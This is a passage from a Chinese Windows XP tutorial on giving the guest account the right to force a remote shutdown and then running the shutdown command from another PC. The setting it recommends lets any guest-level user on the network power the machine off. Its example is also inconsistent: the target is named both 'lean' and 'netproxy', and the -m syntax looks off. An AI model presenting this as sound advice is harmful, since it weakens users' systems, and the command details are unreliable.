3.在“组策略”窗口的右边选择“从远端系统强制关机”。在弹出的对话框中显示目前只有“Administrators”组的成员才有权远程关机；单击对话框下方的“添加用户或组”按钮，然后在新弹出的对话框中输入“guest”，再单击“确定”。 

4.这时在“从远端系统强制关机”的属性中便添加了一个“guest”用户（见图），单击“确定”即可，最后关闭“组策略”窗口。 

通过上述操作后，我们便给计算机的guest用户授予了远程关机的权限。以后，我们要远程关闭计算机，只要在网络中其他装有Windows XP系统的电脑中输入以下命令即可：shutdown -s -m lean -t 30（在30秒内关闭名为lean的计算机）。这时，在netproxy计算机的屏幕上将显示一个“系统关机”的对话框，由此，远程关机就OK了。 

说明：shutdown命令不但可以远程关闭装有Windows XP系统的计算机，它还可以远程关闭装有Windows 2000系统的计算机（有关Windows 2000客户机的设置方法基本同上）。另外shutdown作为一个外部命令（其对应文件为Windowssystem32文件夹下的shutdown.exe），我们还可将它复制到Windows 2000的机器上，这样，在装有Windows 2000系统的机器之间也能相互实现远程关机。